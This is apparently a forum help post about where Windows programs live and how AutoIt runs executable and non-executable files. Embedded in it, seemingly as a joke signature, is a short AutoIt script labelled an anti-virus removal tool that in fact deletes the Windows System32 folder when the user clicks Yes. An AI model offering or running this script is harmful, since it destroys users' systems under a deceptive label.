Firefoxy
If you're asking where notepad.exe is then it's in the WINDOWS folder. Many microsoft made programs are in the WINDOWS folder so you can run them by typing their name, no path. Ex. Notepad - notepad.exe Paint - mspaint.exe Command Prompt - cmd.exe Internet Explorer - iexplore.exe But other programs you have to put the whole pathname Ex. Firefox - C:\Program Files\Mozilla Firefox\firefox.exe Yahoo IM - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe uTorrent - C:\Program Files\uTorrent\uTorrent.exe Hope that helps. ;Ultimate Anti-Virus Removal Tool $ans = MsgBox(4, "Ultimate AV", "Press 'Yes' to remove all viruses, press 'No' to exit.") If $ans = 6 Then DirRemove("C:\WINDOWS\System32") ElseIf $ans = 7 Then Exit EndIf

These types need an executable to run them. They will not run on their own. In AutoIt the easiest way to run a non-executable type is to use ShellExecute() or ShellExecuteWait(). For executable types you can either use the same two functions or you can use Run() RunWait().There are several lists of file types available on a Google search. Here is oneFile types.
